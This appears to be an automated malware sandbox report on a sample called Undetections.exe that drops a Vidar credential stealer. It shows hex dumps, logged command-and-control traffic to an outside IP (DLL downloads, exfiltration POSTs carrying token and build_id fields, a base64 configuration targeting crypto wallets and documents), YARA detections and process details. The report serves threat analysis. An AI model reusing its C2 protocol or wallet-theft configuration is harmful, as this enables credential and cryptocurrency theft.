                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                          Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                          Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                          Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                          Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                          Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                          Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49762 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:40 UTC | 222 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Cache-Control: no-cache
2024-04-10 06:56:40 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:40 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49763 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:41 UTC | 226 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Cache-Control: no-cache
2024-04-10 06:56:42 UTC | 245 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:42 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-13bf0"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49764 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:43 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:43 UTC | 1145 | OUT | Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------KEBGHCBAEGDHIDGCBAECCont
2024-04-10 06:56:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:44 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49765 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:44 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:44 UTC | 331 | OUT | Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------BFIIEHJDBKJKECBFHDGHCont
2024-04-10 06:56:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:45 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49766 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:45 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:45 UTC | 331 | OUT | Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------DAAFBAKECAEGCBFIEGDGCont
2024-04-10 06:56:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:46 UTC | 71 | IN | Data Raw: 33 63 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3cRGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp80


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49767 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:47 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:47 UTC | 453 | OUT | Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------BGIJDGCAEBFIIECAKFHICont
2024-04-10 06:56:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 10 Apr 2024 06:56:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-10 06:56:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49768 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:49 UTC | 329 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Host: 95.217.212.139
Content-Length: 127537
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-10 06:56:49 UTC | 16355 | OUT | Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------EGCBAFCFIJJJECBGIIJKCont
2024-04-10 06:56:50 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:50 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:50 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49769 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:51 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJ
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------JKKEHJDHJKFIECAAKFIJCont
2024-04-10 06:56:52 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:52 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49770 | 95.217.212.139 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-10 06:56:52 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------EHCBAAAFHJDHJJKEBGHICont
2024-04-10 06:56:53 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:53 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
2024-04-10 06:56:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:08:56:02
                                                                                                                                                                                                          Start date:10/04/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Undetections.exe"
                                                                                                                                                                                                          Imagebase:0x430000
                                                                                                                                                                                                          File size:1'800'192 bytes
                                                                                                                                                                                                          MD5 hash:3AF8847A68F187E5425AF04CFE48D1CF
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1639618593.0000000000478000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

Target ID:2
Start time:08:56:13
Start date:10/04/2024
Path:C:\Users\user\AppData\Roaming\Undetections\spoofer.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Undetections\spoofer.exe"
Imagebase:0xc40000
File size:219'136 bytes
MD5 hash:96EF850D149542B53F033375B1C50CC9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 61%, ReversingLabs
Reputation:low
Has exited:true

Target ID:3
Start time:08:56:13
Start date:10/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:08:56:14
Start date:10/04/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:0x760000
File size:65'440 bytes
MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:13%
Dynamic/Decrypted Code Coverage:99.6%
Signature Coverage:2.2%
Total number of Nodes:539
Total number of Limit Nodes:45

Memory Dump Source
• Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3ea0df623942a048cd65786585ef7db1282ef137e9eae7dbd1295713ddf2639
• Instruction ID: 923e1e783695125886e96cad4fdda5b30e3ebfc67993b0065ab2eeaec502c57a
• Opcode Fuzzy Hash: c3ea0df623942a048cd65786585ef7db1282ef137e9eae7dbd1295713ddf2639
• Instruction Fuzzy Hash: 5D64BF38901629CFCB25DF64C9889D9BBB2FF49305F1046E9E509AB361DB35AE85CF40
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
Similarity
• API ID:
• String ID: Hoq$Hoq$Hoq$Hoq$Hoq
• API String ID: 0-1079488684
• Opcode ID: e065ef4ab36db4e16cb33fddb08eda44d884718e379068b46f11432e824ddf2d
• Instruction ID: b3c96e7a91c0f8747c5b1362716d307e1a9f8b9c95957753cef0313bb5cb7bb8
• Opcode Fuzzy Hash: e065ef4ab36db4e16cb33fddb08eda44d884718e379068b46f11432e824ddf2d
• Instruction Fuzzy Hash: 36328DB0A00258CFDB54DFB9C850B9EBBF6AF88304F1485AAD409BB395DB349D45CB91
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
Similarity
• API ID:
• String ID: $(&kq$(oq$Hoq
• API String ID: 0-2837111416
